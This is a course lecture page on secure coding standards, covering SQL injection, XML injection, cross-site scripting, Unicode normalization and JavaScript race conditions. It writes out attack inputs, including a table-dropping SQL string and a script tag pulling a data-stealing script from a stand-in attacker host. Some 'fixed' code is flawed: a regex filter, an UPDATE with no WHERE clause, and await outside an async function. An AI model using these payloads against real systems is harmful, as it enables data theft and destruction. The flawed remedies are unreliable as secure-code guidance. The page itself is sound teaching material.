<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        
        
        
        <link rel="shortcut icon" href="../../img/favicon.ico">
        <title>50.003 - Code Standards - Elements of Software Construction 50.003</title>
        <link href="../../css/bootstrap.min.css" rel="stylesheet">
        <link href="../../css/font-awesome.min.css" rel="stylesheet">
        <link href="../../css/base.css" rel="stylesheet">
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/styles/github.min.css">
        <script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.8.0/highlight.min.js"></script>
        <script>hljs.highlightAll();</script> 
    </head>

    <body>
        <div class="navbar fixed-top navbar-expand-lg navbar-dark bg-primary">
            <div class="container">
                <a class="navbar-brand" href="../..">Elements of Software Construction 50.003</a>
                <!-- Expander button -->
                <button type="button" class="navbar-toggler" data-toggle="collapse" data-target="#navbar-collapse">
                    <span class="navbar-toggler-icon"></span>
                </button>

                <!-- Expanded navigation -->
                <div id="navbar-collapse" class="navbar-collapse collapse">
                        <!-- Main navigation -->
                        <ul class="nav navbar-nav">
                            <li class="navitem">
                                <a href="../.." class="nav-link">Home</a>
                            </li>
                            <li class="navitem">
                                <a href="../l1_course_handout/" class="nav-link">Handout</a>
                            </li>
                        </ul>

                    <ul class="nav navbar-nav ml-auto">
                        <li class="nav-item">
                            <a href="#" class="nav-link" data-toggle="modal" data-target="#mkdocs_search_modal">
                                <i class="fa fa-search"></i> Search
                            </a>
                        </li>
                    </ul>
                </div>
            </div>
        </div>

        <div class="container">
            <div class="row">
                    <div class="col-md-3"><div class="navbar-light navbar-expand-md bs-sidebar hidden-print affix" role="complementary">
    <div class="navbar-header">
        <button type="button" class="navbar-toggler collapsed" data-toggle="collapse" data-target="#toc-collapse" title="Table of Contents">
            <span class="fa fa-angle-down"></span>
        </button>
    </div>

    
    <div id="toc-collapse" class="navbar-collapse collapse card bg-secondary">
        <ul class="nav flex-column">
            
            <li class="nav-item" data-level="1"><a href="#50003-code-standards" class="nav-link">50.003 - Code Standards</a>
              <ul class="nav flex-column">
            <li class="nav-item" data-level="2"><a href="#learning-outcomes" class="nav-link">Learning Outcomes</a>
              <ul class="nav flex-column">
              </ul>
            </li>
            <li class="nav-item" data-level="2"><a href="#coding-standard" class="nav-link">Coding Standard</a>
              <ul class="nav flex-column">
              </ul>
            </li>
            <li class="nav-item" data-level="2"><a href="#sei-cert-java-coding-standard" class="nav-link">SEI CERT Java Coding Standard</a>
              <ul class="nav flex-column">
              </ul>
            </li>
              </ul>
            </li>
        </ul>
    </div>
</div></div>
                    <div class="col-md-9" role="main">

<h1 id="50003-code-standards">50.003 - Code Standards</h1>
<h2 id="learning-outcomes">Learning Outcomes</h2>
<p>By the end  of this unit, you should be able to </p>
<ol>
<li>Apply SEI CERT Java Coding Standard to improve security level of a software system</li>
<li>Eliminate racing conditions in web application via transaction.</li>
</ol>
<h2 id="coding-standard">Coding Standard</h2>
<p>Coding standard is a common guideline for a group of software engineers to follows so as to </p>
<ol>
<li>have a uniform structure of most of the codes</li>
<li>improve readability </li>
<li>improve referenceability </li>
<li>improve maintainability</li>
<li>minimize exploitability</li>
</ol>
<p>Example, we find </p>
<ul>
<li>https://google.github.io/styleguide/</li>
<li>https://wiki.sei.cmu.edu/confluence/display/java/SEI+CERT+Oracle+Coding+Standard+for+Java</li>
</ul>
<h2 id="sei-cert-java-coding-standard">SEI CERT Java Coding Standard</h2>
<p>Let's take SEI CERT Java Coding Standard as an example.
It consists of a set of rules which are meant to provide normative requirements for code. Each rule is associated with a metrics for severity (low, medium, and high), likelihood (unlikely, probably, and likely) and remediation cost (high, medium, and low). Conformance to the rule can be determined through automated analysis (either static or dynamic), formal methods, or manual inspection techniques.</p>
<p>For example, we find a subset of the rules as follows,</p>
<ul>
<li>Input valuation and data sanitization</li>
<li>Object-orientation (not related for now since we focus on JavaScript). But you are strongly encouraged to read up.</li>
<li>Locking and thread-safety (we've covered in some earlier unit in week 6.)</li>
<li>Visibility and atomicity (not covered in this course)</li>
</ul>
<p>Although these coding standards are set for Java and our main language for the module is JavaScript, we will discuss those are applicable to both languages.</p>
<h3 id="input-validation-and-data-sanitization">Input Validation and Data Sanitization</h3>
<p>Many programs accept untrusted data originating from unvalidated users, network connections, and other untrusted sources and then pass the (modified or unmodified) data across a trust boundary to a different trusted domain. Such data must be sanitized. </p>
<p>For example, we find the following rules in this category</p>
<ol>
<li>IDS00-J. Sanitize untrusted data passed across a trust boundary</li>
<li>IDS01-J. Normalize strings before validating them</li>
<li>IDS11-J. Eliminate non-character code points before validation</li>
</ol>
<h4 id="ids00-j-sanitize-untrusted-data-passed-across-a-trust-boundary">IDS00-J. Sanitize untrusted data passed across a trust boundary</h4>
<p>The main idea is simple, given data provided by 3rd party, we should perform some sanitization to ensure the data is not malicious. </p>
<h5 id="sql-injection">SQL Injection</h5>
<p>An example of such data is SQL injection.</p>
<p>Suppose, we have the following code</p>
<pre><code class="language-js">function login(db, un, pw) {
    const [rows, fieldDefs] = await db.pool.query(`
            SELECT * FROM db_user WHERE username='${un}' AND password='${pw}' 
        `);
    let found = false;
    if (rows.length &gt; 0) {
        found = true;
    }
    return found;
}
</code></pre>
<p>Function <code>login</code> takes a database connection object <code>con</code>, the username <code>un</code> and password <code>pw</code> and try to search for the user record in the <code>db_user</code> table. 
Note that <code>un</code> and <code>pw</code> are input strings povided by external parties, normal users and malicious users. 
A malicious user might set <code>un</code> to <code>""</code> and <code>pw</code> to <code>"' OR '0'='0"</code>
the query becomes </p>
<pre><code class="language-sql">SELECT * FROM db_user WHERE username='' AND password='' OR '0' = '0';
</code></pre>
<p>which always return all the records from the <code>db_user</code> table. As a result, the user can login without giving a user name and password.</p>
<p>In the worst situation, a malicious user could give the following input <code>un = ""</code> and <code>pw = "'; drop table db_user; --"</code>, the query becomes</p>
<pre><code class="language-sql">SELECT * FROM db_user WHERE username='' AND password=''; drop table db_user; --'
</code></pre>
<p>As a result, all the records in the <code>db_user</code> are deleted. </p>
<p>To prevent SQL injection attacks, a <em>Prepared Statement</em> should be used.</p>
<pre><code class="language-js">function login(db, un, pw) {
    const [rows, fieldDefs] = await db.pool.query(`
            SELECT * FROM db_user WHERE username= ? AND password= ? 
        `, [un, pw]);
    let found = false;
    if (rows.length &gt; 0) {
        found = true;
    }
    return found;
}
</code></pre>
<p>In the updated version above, we use an overloaded <code>query()</code> to define a prepared statement. to manage the query. The <code>?</code> placeholders allow the programmers to indicate where the untrusted input should be inserted after being sanitized. Via the prepared statement, we sanitize the untrusted input strings before inserting them into the statement.</p>
<h5 id="xml-injection">XML Injection</h5>
<p>Besides SQL injection, untrusted XML data fragment imposes threats  to the system security too. </p>
<p>Consider the following JavaScript program </p>
<pre><code class="language-js">function addIPhone(qty) {
    const doc = `&lt;item&gt;
        &lt;description&gt;iPhone X&lt;/description&gt;
        &lt;price&gt;999.0&lt;/price&gt; 
        &lt;quantity&gt;${qty}&lt;/quantity&gt; 
        &lt;/item&gt;`;
    addToCart(doc);
}
</code></pre>
<p>when a normal user invokes the above function with <code>qty = "1"</code>, the resulting
XML document </p>
<pre><code class="language-xml">&lt;item&gt;
    &lt;description&gt;iPhone X&lt;/description&gt;
    &lt;price&gt;999.0&lt;/price&gt;
    &lt;quantity&gt;1&lt;/quantity&gt;
&lt;/item&gt;
</code></pre>
<p>which captures the user's shopping item, will be process by <code>addToCart()</code> function.</p>
<p>Suppose a malicious user invokes the function with a rigged input <code>qty = "1&lt;/quantity&gt;&lt;price&gt;1.0&lt;/price&gt;&lt;quantity&gt;1"</code> which results in the following XML document </p>
<pre><code class="language-xml">&lt;item&gt;
    &lt;description&gt;iPhone X&lt;/description&gt;
    &lt;price&gt;999.0&lt;/price&gt;
    &lt;quantity&gt;1&lt;/quantity&gt;
    &lt;price&gt;1&lt;/price&gt;
    &lt;quantity&gt;1&lt;/quantity&gt;
&lt;/item&gt;
</code></pre>
<p>If the <code>addToCart()</code> method processes the elements top-to-bottom in order, it might override the price value <code>999.0</code> by <code>1</code>.</p>
<p>The fix to this issue is similar to the one for SQL injection. What is required is to santize the input string before embedding into the XML template which is used as a trusted data. </p>
<h3 id="ids01-j-normalize-strings-before-validating-them">IDS01-J. Normalize strings before validating them</h3>
<h5 id="cross-site-scripting">Cross Site Scripting</h5>
<p>The third example of security loop holes caused by using untrusted data in the trusted context is Cross Site Scripting.</p>
<p>Consider the following app</p>
<pre><code class="language-js">app.use('/', (req,res) =&gt; {
    let msg = dbmodel.getOne();
    res.send(
        `&lt;div&gt; the message is &lt;/div&gt; &lt;div&gt; ${msg} &lt;/div&gt;`
    );
})
</code></pre>
<p>Suppose the message created by some normal user and recored in the database is <code>"hello"</code>. The above route handler returns</p>
<pre><code class="language-html">&lt;div&gt; the message is &lt;/div&gt;
&lt;div&gt; hello &lt;/div&gt;
</code></pre>
<p>However the threat surfaces when the message retrieved from the database is 
<code>"&lt;script src='http://hacker-network.io/stealuserinfo.js' type='javascript'&gt;&lt;/script&gt; "</code> as the resulting html document becomes</p>
<pre><code class="language-html">&lt;div&gt; the message is &lt;/div&gt;
&lt;div&gt; &lt;script src='http://hacker-network.io/stealuserinfo.js' type='javascript'&gt;&lt;/script&gt; &lt;/div&gt;
</code></pre>
<p>when it is executed on the victim's browser, the hacker's script will be executed and extract the information from the victim's machine. </p>
<p>One way to address this issue is to santize the record retrieved from the database</p>
<pre><code class="language-js">app.use('/', (req,res) =&gt; {
    let msg = dbmodel.getOne();
    const regex = /&lt;.*&gt;/g;
    let html = &quot;&quot;:
    if (msg.match(regex)) {
        html = &quot;&lt;div&gt; the message contains some illegal characters &lt;/div&gt;&quot;;
    } else {
        html = `&lt;div&gt; the message is &lt;/div&gt; &lt;div&gt; ${msg} &lt;/div&gt;`;
    }
    res.send(html);
})
</code></pre>
<p>However this might not cover all edge cases. Suppose the malicious user use the unicode representation of the <code>&lt;</code> and <code>&gt;</code>, namely and <code>\uFE64</code> and <code>\uFE65</code>.</p>
<p>This motivates the need of normalizing the unicode representations into the ascii representation before sanization.</p>
<pre><code class="language-js">app.use('/', (req,res) =&gt; {
    let msg = dbmodel.getOne();
    const regex = /&lt;.*&gt;/g;
    let html = &quot;&quot;:
    if (msg.normalize('NFKC').match(regex)) {
        html = &quot;&lt;div&gt; the message contains some illegal characters &lt;/div&gt;&quot;;
    } else {
        html = `&lt;div&gt; the message is &lt;/div&gt; &lt;div&gt; ${msg} &lt;/div&gt;`;
    }
    res.send(html);
})
</code></pre>
<h3 id="pseudo-racing-condition-in-javascript">Pseudo Racing condition in JavaScript</h3>
<p>Note that there is no multi-threading in JavaScript. JavaScript concurrency is actualized via promises and event call back. 
It does not make JavaScript applications free from the plague of racing conditions. </p>
<p>For example consider the following program</p>
<pre><code class="language-js">let a = { bal : 100 }
let b = { bal : 200 }
let c = { bal : 150 }

function get_bal(acc) {
    return new Promise((resolve, reject) =&gt; {
        resolve(acc.bal);
    })
}

function set_bal(acc, new_bal) {
    return new Promise((resolve, reject) =&gt; {
        acc.bal = new_bal;
        resolve(new_bal);
    })
}
</code></pre>
<p>In the above we instantiate three objects to simulate some separates accounts.
We define </p>
<ul>
<li>a <code>get_bal()</code> promise builder function which returns a promise that resolves on the account's balance.</li>
<li>a <code>set_bal()</code> promise builder function which returns a promise that updates the account's balance.</li>
</ul>
<p>Next we define a <code>transfer()</code> function which transfer some amount from two accounts, by calling <code>get_bal()</code> and <code>set_bal()</code></p>
<pre><code class="language-js">async function transfer(src, dst, amt) {
    let src_bal = await get_bal(src);
    let dst_bal = await get_bal(dst);
    if (src_bal &gt; amt) {
        await set_bal(dst, dst_bal + amt); 
        await set_bal(src, src_bal - amt);
    }
}
</code></pre>
<p>Finally, we define our main function and the aftermath observation </p>
<pre><code class="language-js">async function main() {
    await transfer(b, a, 100);
    await transfer(c, a, 50);
}

main().then(
    async function () {
        let bal_b = await get_bal(b);
        let bal_a = await get_bal(a);
        let bal_c = await get_bal(c);
        console.log(bal_a,bal_b,bal_c);
    }
)
</code></pre>
<p>In the <code>main()</code> function, we sequentially transfer 100 from <code>b</code> to <code>a</code> then transfer 50 from <code>c</code> to <code>a</code>. </p>
<p>We observe the closing balances as <code>250 100 100</code>.</p>
<p>This is fine because the two transfer operations were carried out in sequence, (enforced by two <code>await</code>).</p>
<p>Suppose we change the <code>main</code> function as follows, </p>
<pre><code class="language-js">async function main() {
    transfer(b, a, 100);
    await transfer(c, a, 50);
}
</code></pre>
<p>or </p>
<pre><code class="language-js">async function main() {
    await Promise.all([
        transfer(b, a, 100),
        transfer(c, a, 50)
    ]);
}
</code></pre>
<p>In either way, the two transfer operations are performed concurrently, i.e. the promises are now interleaved. When we observe the closing balances as <code>150 100 100</code>. A racing condition is triggered.</p>
<p>One may argue that the above variants of <code>main()</code> are unusual, after some code review, we perhaps can eliminate the bugs. However, in the event that the two transfer operations are triggered from separate server events, e.g. from two different HTTP request handlers, such a racing condition is inevitable.</p>
<h4 id="concurrency-control-at-the-database-level">Concurrency Control at the database level</h4>
<p>We can address such a data racing condition at the database level. In particular for many modern database system, we find transaction typically useful in managing concurrent read and update combo operations.</p>
<p>For instance, in the echo app model file <code>message.js</code> we would like to define a new operation which first search for a message in the database, update it if the message exists. In the event of concurrent access, such a find-and-update operation can lead to a racing condition. We prevent the racing condition by enclosing the read and write database operations in a transaction.</p>
<pre><code class="language-js">async function update(message, newTxt) {
    try {
        await db.pool.beginTransaction(); 
        const [rows, fieldDefs] = await db.pool.query(`
            SELECT * FROM ${tableName} where time = ? AND msg = ?`, [message.time, message.msg]
        );
        if (rows.length &gt; 0) {
            await db.pool.execute(`
                UPDATE ${tableName} SET time = ? AND msg = ?`, [message.time, message.msg + newTxt]
            );
        }
        await db.pool.commit();
    } catch (error) {
        console.error(&quot;database connection failed. &quot; + error);
    }
}
</code></pre>
<h4 id="further-reading-on-transactions">Further reading on transactions</h4>
<ul>
<li>https://mongoosejs.com/docs/transactions.html</li>
<li>https://sequelize.org/docs/v6/other-topics/transactions/</li>
</ul></div>
            </div>
        </div>

        <footer class="col-md-12">
            <hr>
            <p>Documentation built with <a href="https://www.mkdocs.org/">MkDocs</a>.</p>
        </footer>
        <script src="../../js/jquery-3.6.0.min.js"></script>
        <script src="../../js/bootstrap.min.js"></script>
        <script>
            var base_url = "../..",
                shortcuts = {"help": 191, "next": 78, "previous": 80, "search": 83};
        </script>
        <script src="../../js/base.js"></script>
        <script src="../../javascripts/mathjax.js"></script>
        <script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
        <script src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>
        <script src="../../search/main.js"></script>

        <div class="modal" id="mkdocs_search_modal" tabindex="-1" role="dialog" aria-labelledby="searchModalLabel" aria-hidden="true">
    <div class="modal-dialog modal-lg">
        <div class="modal-content">
            <div class="modal-header">
                <h4 class="modal-title" id="searchModalLabel">Search</h4>
                <button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button>
            </div>
            <div class="modal-body">
                <p>From here you can search these documents. Enter your search terms below.</p>
                <form>
                    <div class="form-group">
                        <input type="search" class="form-control" placeholder="Search..." id="mkdocs-search-query" title="Type search term here">
                    </div>
                </form>
                <div id="mkdocs-search-results" data-no-results-text="No results found"></div>
            </div>
            <div class="modal-footer">
            </div>
        </div>
    </div>
</div><div class="modal" id="mkdocs_keyboard_modal" tabindex="-1" role="dialog" aria-labelledby="keyboardModalLabel" aria-hidden="true">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header">
                <h4 class="modal-title" id="keyboardModalLabel">Keyboard Shortcuts</h4>
                <button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button>
            </div>
            <div class="modal-body">
              <table class="table">
                <thead>
                  <tr>
                    <th style="width: 20%;">Keys</th>
                    <th>Action</th>
                  </tr>
                </thead>
                <tbody>
                  <tr>
                    <td class="help shortcut"><kbd>?</kbd></td>
                    <td>Open this help</td>
                  </tr>
                  <tr>
                    <td class="next shortcut"><kbd>n</kbd></td>
                    <td>Next page</td>
                  </tr>
                  <tr>
                    <td class="prev shortcut"><kbd>p</kbd></td>
                    <td>Previous page</td>
                  </tr>
                  <tr>
                    <td class="search shortcut"><kbd>s</kbd></td>
                    <td>Search</td>
                  </tr>
                </tbody>
              </table>
            </div>
            <div class="modal-footer">
            </div>
        </div>
    </div>
</div>

    </body>
</html>
